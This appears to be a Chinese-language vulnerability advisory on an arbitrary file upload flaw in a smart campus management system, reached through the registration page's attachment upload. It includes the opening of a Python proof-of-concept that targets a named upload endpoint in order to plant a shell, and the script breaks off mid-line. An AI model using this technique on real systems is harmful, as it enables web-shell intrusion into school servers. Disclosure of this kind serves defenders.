智慧校园管理系统 前台任意文件上传漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

在登陆界面中存在企业用户注册就可以尝试该漏洞 在注册页面存在上传附件的功能,我们可以在这里上传shell文件 ![](https://images.seebug.org/1630035466369-w331s) ![](https://images.seebug.org/1630035475662-w331s) 漏洞利用POC ``` import requests import sys import random import re import base64 import time from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m') print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m') print('+ 33[34m公众号 : PeiQi文库 33[0m') print('+ 33[34mVersion: 智慧校园管理系统 33[0m') print('+ 33[36m使用格式: python3 poc.py 33[0m') print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/DC_OA_WJG/Upload" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "multipart/form-data;...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息